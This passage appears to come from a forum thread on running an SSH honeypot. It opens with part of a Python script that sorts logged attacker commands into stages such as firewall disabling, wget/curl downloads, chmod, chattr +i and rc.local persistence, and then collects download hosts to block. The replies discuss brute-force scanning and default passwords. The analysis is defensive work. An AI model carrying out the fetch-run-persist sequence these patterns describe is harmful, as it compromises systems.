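'''

URL_HOST = re.compile(r"https?://([^/\s:]+)")
# First match wins, so an echo of a firewall command into rc.local counts as persistence.
STAGES = [
    ("persistence", re.compile(r">>\s*/etc/rc\.local")),
    ("firewall_off", re.compile(r"(iptables|SuSEfirewall2)\s+stop")),
    ("download", re.compile(r"^\s*(wget|curl)\b")),
    ("make_exec", re.compile(r"^\s*chmod\s+(0?7[57][57]|u\+x)\b")),
    ("immutable", re.compile(r"^\s*chattr\s+\+i\b")),
    ("execute", re.compile(r"^\s*(nohup\s+)?(\./|/tmp/|/root/)\S+")),
]

def parse_rows(text):
    """Yield (session, timestamp, input) from a MySQL-style CSV export."""
    reader = csv.reader(io.StringIO(text), escapechar="\\", doublequote=False)
    for row in reader:
        if len(row) == 6:          # skip blank or truncated lines
            yield row[1], row[2], row[5]

def classify(cmd):
    for name, pattern in STAGES:
        if pattern.search(cmd):
            return name
    return None

def summarise(text):
    """Group commands by session and record stages in first-seen order."""
    sessions = defaultdict(lambda: {"stages": [], "hosts": set(), "commands": 0})
    for session, _ts, cmd in parse_rows(text):
        info = sessions[session]
        info["commands"] += 1
        stage = classify(cmd)
        if stage and stage not in info["stages"]:
            info["stages"].append(stage)
        info["hosts"].update(URL_HOST.findall(cmd))
    return dict(sessions)

def verdict(info):
    stages = set(info["stages"])
    if "download" in stages and stages & {"execute", "persistence"}:
        return "dropper"           # fetched a file, then tried to run or persist it
    return "download-only" if "download" in stages else "recon"
```

Calling `summarise()` on a full export and sorting by `verdict()` separates the scripted install sessions from the hand-typed `ls`/`pwd`/`uname -a` probes, and the per-session `hosts` sets give the download servers to look up or block.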

Offline proxx

Re: 1 day of running a SSH honeypot
« Reply #25 on: June 23, 2015, 10:06:27 pm »
Well that's a bunch of dirt.
Interesting stuff, do you also have the file that was uploaded?
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline ColonelPanic

Re: 1 day of running a SSH honeypot
« Reply #26 on: June 24, 2015, 12:15:43 am »
This is rampant on hosted boxes (Hetzner, DigitalOcean, etc.) since they use known blocks of IP addresses. If I had to guess, I'd say the reason is either 1) skids playing with tools on default settings (or checking all the boxes), or 2) people targeting the one-click install images available on sites like DigitalOcean. e.g., hoping someone spun up a GitLab instance and forgot about it, or only used the web installer. With images like WordPress and such available, I'm sure it's pretty common.

Offline xor

Re: 1 day of running a SSH honeypot
« Reply #27 on: June 24, 2015, 03:16:02 am »
What you'll find is that most of the passwords listed, whilst appearing silly, will have been either a default password for some device that was released that you may not have even encountered yet, or a successful hit based on previous scans.


You'd be surprised how many SSH / Telnet servers still use default passwords like this.


-- xor

Offline nozzlechunks

Re: 1 day of running a SSH honeypot
« Reply #28 on: June 24, 2015, 04:59:48 pm »
I don't have any of the files anymore, so who knows what they were pulling down. Probably bots and downloaders.

Yeah, I don't think these people are noobs. Lot of the stuff they do would work against an environment that was A) real, and 2) misconfigured. I'm guessing this is one of those operations where they scan for the low hanging stuff and then pass this off to the next team, to actually dig in to see what they got. If they get something interesting, they probably hand it off to a traversal team, etc.

If anyone has cool ideas for different experiments I could work on with Kippo and other honeypot tools, feel free to throw them out there or even PM me!

Offline mr.sinister

Re: 1 day of running a SSH honeypot
« Reply #29 on: July 27, 2015, 08:16:36 pm »
port 22 brute force attempts are pretty much a permanent thing on all of my servers :P
so I change the port and they disappear :D
plus a permanent p0f logger captures the attempts on ports that are not open.